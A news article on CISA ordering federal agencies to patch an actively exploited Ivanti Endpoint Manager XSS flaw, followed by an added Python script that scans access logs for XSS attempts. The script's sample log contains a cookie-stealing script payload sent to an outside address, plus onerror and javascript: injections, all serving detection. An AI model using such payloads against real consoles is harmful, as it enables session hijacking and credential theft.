The US Cybersecurity and Infrastructure Security Agency (CISA) has raised the alarm about a high-severity vulnerability in Ivanti Endpoint Manager (EPM) and has ordered federal agencies to apply the patches within three weeks. Tracked as CVE-2026-1603, the flaw allows remote attackers to bypass authentication mechanisms and extract credentials through a cross-site scripting (XSS) attack that, according to the advisories, is of low complexity and requires no user interaction.
Ivanti EPM is a platform for managing endpoints and client devices across multiple operating systems and environments, including Windows, macOS, Linux, Chrome OS and IoT devices. That breadth is precisely what makes its vulnerabilities an attractive target: a flaw in the management server can translate into access to tens or hundreds of managed machines.

Ivanti published fixes about a month ago with the release of Ivanti EPM 2024 SU5, which, in addition to mitigating the XSS, corrects an SQL injection that could allow arbitrary data to be read from the database. The company's statement details the available mitigations and download links in its security bulletin, available on its official portal.
Although Ivanti noted that, as of the publication of its advisory and when asked by the press, it had not received confirmed reports of exploitation against customers, CISA decided to add the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog and described it as being used in real attacks, a decision that is usually based on telemetry from multiple sources and observed attack patterns. CISA's own notice of the new catalog inclusion highlights this addition and stresses that such flaws are frequent attack vectors for malicious actors; see the CISA statement and the specific entry in the catalog.
The potential scope of the problem is also reflected in public scans: the Shadowserver monitoring platform shows more than 700 instances of Ivanti EPM exposed to the Internet, mainly in North America, although there is no public data on how many of these instances run vulnerable versions and how many are already patched. The Shadowserver view offers a snapshot of the state of public exposure and can be reviewed on its dashboard (see the Shadowserver statistics).
Federal authorities have not acted in isolation: inclusion in the KEV triggers a binding obligation for US federal civilian executive branch agencies, which must apply the fix within the deadline set by the operational directive. This requirement comes from BOD 22-01, the binding operational directive issued by CISA (part of the Department of Homeland Security) that sets timelines and priorities for mitigating vulnerabilities listed as exploited in the wild; the full document is available on the DHS site (BOD 22-01).
It is important to put this episode in context: Ivanti and other endpoint management vendors have been recurring targets. In 2024, CISA had already urged organizations to secure their networks against several actively exploited Ivanti flaws, and in October of that year it also mandated patching of another Ivanti vulnerability detected in real environments. The recurrence of these incidents highlights two realities of the current cybersecurity landscape: on the one hand, central management tools concentrate potential impact; on the other, attack groups prioritize flaws that give initial access or allow credential exfiltration.

For security teams and infrastructure managers there are a number of practical steps to prioritize immediately. First, confirm whether any affected version of Ivanti EPM is deployed and apply the patches published by the vendor. Then, if there are Internet-accessible instances, restrict external access through the firewall or a VPN, and consider temporarily taking exposed services offline while the fix is being applied. It is also worth reviewing logs and alerts for unusual activity around the administration console, and forcing rotation of credentials and administrative keys to limit the damage if any have leaked. Finally, a defense-in-depth posture, with network segmentation, multifactor authentication and tight privilege control, reduces the likelihood that a single vulnerability escalates into a compromise of critical environments.
Ivanti provides services and products to tens of thousands of organizations through an extensive network of partners, which multiplies the importance of a coordinated and rapid response. The interplay between vendor advisories, telemetry from organizations such as Shadowserver and agency alerts such as CISA's is today the best line of defense for accelerating the mitigation of high-risk flaws. If you administer EPM systems, the recommendation is clear: verify versions, apply patches and reduce public exposure without delay.
For further technical detail and to follow the incident as it evolves, see the official sources linked in this text and keep an eye on Ivanti's bulletins and CISA's updates, which reflect both the exploitation status and the response guidance for federal and private environments.
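As an added illustration of the log-review step, not code from Ivanti, CISA or the original article, the Python script below scans web-server access logs in Combined Log Format for requests to the administration interface whose query parameters carry cross-site scripting payloads (script tags, injected event-handler attributes, `javascript:` URIs, and double-encoded variants of these). The sample log lines, the `/admin/` path prefix and the source addresses are constructed for the example; the article does not give the real EPM console paths, so `ADMIN_PREFIXES` is an assumption to be replaced with the paths of your own deployment.

```python
"""Flag access-log requests to an admin surface whose query parameters look like XSS payloads.

Added example. The sample log lines and the /admin/ prefix are constructed and are not
taken from Ivanti documentation; point ADMIN_PREFIXES at your real management-console paths.
"""
import re
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Hypothetical path prefix of the management console (assumption for this example).
ADMIN_PREFIXES = ("/admin/",)

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators checked against each percent-decoded query-parameter value.
XSS_PATTERNS = [
    ("script_tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    # Event-handler attribute injected after breaking out of a quoted attribute: " onerror=...
    ("event_handler", re.compile(r"""(?:^|[\s"'/])on[a-z]+\s*=""", re.I)),
    ("javascript_uri", re.compile(r"javascript\s*:", re.I)),
    ("html_tag", re.compile(r"<\s*(?:img|svg|iframe|object|embed)\b", re.I)),
]

# Constructed sample traffic using RFC 5737 documentation addresses; not real Ivanti logs.
SAMPLE_LOG = """\
203.0.113.10 - - [05/Mar/2026:10:14:01 +0000] "GET /admin/login.aspx HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.10 - - [05/Mar/2026:10:14:09 +0000] "GET /admin/search.aspx?q=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F203.0.113.99%2F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 812 "-" "curl/8.4.0"
198.51.100.7 - - [05/Mar/2026:10:15:44 +0000] "GET /admin/devices.aspx?name=%22%20onerror%3Dalert(1)%20x%3D%22 HTTP/1.1" 200 2048 "-" "python-requests/2.31"
192.0.2.5 - - [05/Mar/2026:10:16:02 +0000] "GET /admin/devices.aspx?name=laptop-0042 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.5 - - [05/Mar/2026:10:16:30 +0000] "POST /admin/settings.aspx HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.10 - - [05/Mar/2026:10:17:12 +0000] "GET /help/index.html?topic=javascript:alert(1) HTTP/1.1" 404 0 "-" "curl/8.4.0"
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one Combined Log Format line into its fields, or None if it does not match."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def decode(value: str, rounds: int = 2) -> str:
    """Percent-decode up to `rounds` times so double-encoded payloads are also caught."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def xss_indicators(target: str) -> List[str]:
    """Names of the XSS indicators present in any query-parameter value of the request target."""
    hits: List[str] = []
    for _key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = decode(value)  # parse_qsl decoded once already; this catches a second layer
        for name, pattern in XSS_PATTERNS:
            if name not in hits and pattern.search(decoded):
                hits.append(name)
    return hits


def scan(log_text: str, admin_prefixes=ADMIN_PREFIXES) -> List[dict]:
    """Return one finding per request whose query string carries an XSS indicator."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        indicators = xss_indicators(rec["target"])
        if not indicators:
            continue
        path = urlsplit(rec["target"]).path
        findings.append({
            "ip": rec["ip"],
            "ts": rec["ts"],
            "method": rec["method"],
            "path": path,
            "status": int(rec["status"]),  # a 2xx on the admin surface means the payload was processed
            "ua": rec["ua"],
            "indicators": indicators,
            "admin_surface": path.startswith(admin_prefixes),
        })
    return findings


def admin_sources(findings: List[dict]) -> Counter:
    """Source addresses that sent XSS-like requests to the admin surface, with counts."""
    return Counter(f["ip"] for f in findings if f["admin_surface"])


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        surface = "ADMIN" if f["admin_surface"] else "other"
        print(f'{f["ts"]} {f["ip"]:<15} {surface:<5} {f["status"]} {f["path"]} '
              f'{",".join(f["indicators"])} ua={f["ua"]}')
    print("sources hitting the admin surface:", dict(admin_sources(results)))
```

Findings against the admin surface that returned a 2xx status deserve the first look, since those are requests the console actually processed; a pattern of probes from one address across several parameters is a good trigger for the credential rotation the article recommends.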